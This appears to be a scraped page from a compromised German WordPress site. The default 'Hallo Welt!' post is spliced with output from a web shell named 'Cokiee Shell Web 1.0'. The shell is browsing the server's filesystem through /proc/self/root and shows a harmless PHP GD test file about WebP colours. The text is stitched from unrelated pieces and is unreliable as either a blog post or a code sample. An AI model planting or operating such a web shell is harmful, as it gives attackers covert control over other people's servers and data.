Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/gd/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/gd/tests/bug70102.phpt |
--TEST-- Bug #70102 (imagecreatefromwebm() shifts colors) --SKIPIF-- <?php if (!extension_loaded('gd')) die('skip gd extension not available'); if (!GD_BUNDLED && version_compare(GD_VERSION, '2.2.0', '<')) { die("skip test requires GD 2.2.0 or higher"); } if (!function_exists('imagewebp') || !function_exists('imagecreatefromwebp')) die('skip WebP support not available'); ?> --FILE-- <?php $filename = __DIR__ . '/bug70102.webp'; $im = imagecreatetruecolor(8, 8); $white = imagecolorallocate($im, 255, 255, 255); var_dump($white & 0xffffff); imagefilledrectangle($im, 0, 0, 7, 7, $white); imagewebp($im, $filename); imagedestroy($im); $im = imagecreatefromwebp($filename); $color = imagecolorat($im, 4, 4); var_dump($color & 0xffffff); ?> --CLEAN-- <?php unlink(__DIR__ . '/bug70102.webp'); ?> --EXPECT-- int(16777215) int(16777215)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare